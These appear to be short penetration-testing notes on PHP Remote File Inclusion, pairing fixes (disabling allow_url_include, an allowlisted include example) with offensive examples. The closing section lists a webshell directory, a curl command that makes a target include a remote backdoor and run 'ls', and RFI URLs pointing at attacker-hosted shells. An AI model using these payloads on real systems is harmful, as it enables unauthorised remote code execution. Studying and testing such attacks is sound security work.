
Remote File Inclusion

To fix RFI, disable allow_url_include in PHP so that remote files cannot be included, and never pass a URL taken from user input directly to include. If remote content is needed, fetch it with a safe method such as cURL.

; php.ini
allow_url_include = Off

// PHP: the include target comes straight from the request
include($_GET['page']); // unsafe
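A hardened counterpart to the unsafe include above, as an added example that is not part of the original notes: the `page` parameter is only used as a key into a fixed allowlist, so a URL, wrapper or traversal string never reaches `include`. It assumes PHP 8; the page names, the `pages/` directory and the function names are hypothetical.

```php
<?php
declare(strict_types=1);

// Added example; the page names and the pages/ directory are assumptions.
const PAGE_DIR = __DIR__ . '/pages';
const PAGES = [
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

// Map the untrusted ?page= value to a fixed local file, or null if unknown.
function resolve_page(mixed $requested): ?string
{
    // ?page[]=x arrives as an array; anything but a string is rejected.
    if (!is_string($requested)) {
        return null;
    }
    // Exact key lookup: URLs, wrappers and ../ sequences can never match.
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }
    return PAGE_DIR . '/' . PAGES[$requested];
}

// Defence in depth: report if the ini setting has been switched back on.
function url_include_enabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs; run from the command line to see each decision.
    $samples = ['home', 'http://192.0.2.10/x.php', '../../etc/passwd', ['home']];
    foreach ($samples as $s) {
        $shown = json_encode($s, JSON_UNESCAPED_SLASHES);
        printf("%-28s => %s\n", $shown, resolve_page($s) ?? 'rejected');
    }
    printf("allow_url_include enabled: %s\n", url_include_enabled() ? 'yes' : 'no');
} else {
    if (url_include_enabled()) {
        error_log('allow_url_include is On; expected Off');
    }
    $path = resolve_page($_GET['page'] ?? 'home');
    if ($path === null || !is_file($path)) {
        http_response_code(404);
        exit('Page not found');
    }
    include $path; // only a fixed, local, allowlisted file reaches include
}
```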

Find PHP webshells to test

ls /usr/share/webshells/php/

RFI command execution example

curl "http://mountaindesserts.com/meteor/index.php?page=http://192.168.119.3/simple-backdoor.php&cmd=ls"

Another RFI example

http://10.11.1.35/section.php?page=http://192.168.119.168:80/hacker.txt
https://example.com/index.php?page=https://attacker.com/shell.php